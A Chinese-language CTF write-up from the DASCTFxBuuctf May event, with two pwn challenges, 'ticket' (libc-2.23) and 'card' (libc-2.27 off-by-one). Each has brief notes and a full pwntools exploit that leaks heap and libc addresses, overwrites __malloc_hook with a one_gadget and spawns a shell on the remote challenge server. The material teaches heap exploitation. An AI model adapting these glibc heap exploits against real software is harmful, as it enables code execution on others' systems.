Niyah

DASCTFxBuuctf五月大联动

还得加油

# ticket

libc-2.23 下的题目,漏洞点在于只要某个位置 + 6 的地方有值,就可以 free 该位置,之后将那个位置 + 6 位置清 0

  1. 将输入信息的堆块申请两次,之后 free 掉 name 和(-2 和 - 1)再显示信息就可以泄露堆地址
  2. 利用 unsortedbin 切割后输出泄露出 libc 地址
  3. 既然我们有堆地址,那么我们可以在 age 出伪造一个指针,这个指针指向一个堆块,那么加上之前申请的一个指针就有两个指针指向了同一个堆块,强行 uaf
  4. 利用 relloc 调节栈帧再使用 onegadget getshell
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'

binary = 'ticket'
elf = ELF(binary)
libc = ELF("./libc-2.23.so")
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  #p = process(["qemu-aarch64","-L","",binary])
  #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
  host = "node3.buuoj.cn"
  port =  29266
  p = remote(host,port)

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))

def dbg():
  gdb.attach(p)
  pause()

def cmd(num):
  sla(">>",num)

def add(id,size):
  cmd(1)
  sla("Index:",id)
  sla("size:",size)

def delete(id):
  cmd(2)
  sla("Index:",id)

def edit(id,text):
  cmd(3)
  sla("Index:",id)
  sla("remarks:",text)

def show(id):
  cmd(4)
  sla("Index:",id)

def show_info():
  cmd(6)

def info(addr):
  sa("Your name:","a"*0x20)
  sa("take off(wu hu qi fei): ","a"*0x20)
  sla("Your age: ",addr)

one_gad = [0x45216,0x4526a,0xf02a4,0xf1147]

info(1)
cmd(5)
info(1)

add(4,0x100) # 保证name+6地方有值
add(5,0x100) 

delete(-2)
delete(-1)

show_info()

p.recvuntil("Saying: ")

heap_addr =  u64(p.recvuntil("\x0a")[0:-1].ljust(8,"\x00"))
lg("leak",heap_addr)

add(0,0x28)
add(1,0x28)

add(2,0x118)
add(3,0x118)
delete(2)
add(2,0x28)
show(2)

__malloc_hook = l64() - 360 - 16
lg("__malloc_hook",__malloc_hook)

libc_base = __malloc_hook - libc.sym["__malloc_hook"]
realloc = libc.sym["realloc"] + libc_base
one_gadget = libc_base + one_gad[0]

lg("realloc",realloc)
lg("libc_base",libc_base)

delete(2)
delete(-10)

add(2,0x60) #0x70大小可以与malloc处伪造堆块链到

cmd(5)
info(heap_addr+0x2b0+0x10)

delete(-3)

edit(2 ,p64(__malloc_hook - 0x23)) #构造两个指针指向同一堆块

delete(0)
delete(1)

add(0,0x68)
add(1,0x68)

payload = "a"*0xb + p64(one_gad[1] + libc_base) + p64(realloc +6)

edit(1, payload)

#dbg()

delete(-10)
cmd(5)


p.interactive()

# card

libc-2.27 off-by-one

# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'

binary = 'card'
elf = ELF('card')
libc = ELF("libc.so")
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  #p = process(["qemu-aarch64","-L","",binary])
  #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
  host = "node3.buuoj.cn"
  port =  25850
  p = remote(host,port)

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))

def dbg():
    gdb.attach(p)
    pause()

def cmd(num):
  sla("choice:",num)

def add(id,size,text):
  cmd(1)
  sla("card:",id)
  sla("power:",size)
  sla("quickly!",text)

def edit(id,text):
  cmd(2)
  sla("card",id)
  sla("show",text)

def delete(id):
  cmd(3)
  sla("card:",id)

def show(id):
  cmd(4)
  sla(":",id)

one_gadget = [0x4f2c5,0x4f322,0x10a38c]

for i in range(7):
  add(i,0x98,"aaaa")

add(7,0x98,"aaaa")
add(8,0x98,"aaaa")

for i in range(7):
  delete(i)

delete(7)
add(9,0x18,"aaa")
add(10,0x18,"aaa")
add(11,0x18,"aaa")

show(9)
l64()

__malloc_hook = l64() - 240 - 16
lg("leak",__malloc_hook)
libc_base = __malloc_hook - libc.sym["__malloc_hook"]

edit(9,"\x00"*0x18 + "\x41" )
delete(10)

add(10,0x38,"aaa")

delete(11)
payload = p64(0) *3 + p64(0x21) + p64(__malloc_hook)

edit(10,payload)

add(0,0x18,"aaa")
add(1,0x18,p64(one_gadget[2]+libc_base))

cmd(1)
sla("card:",3)
sla("power:",0x10)

p.interactive()

本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。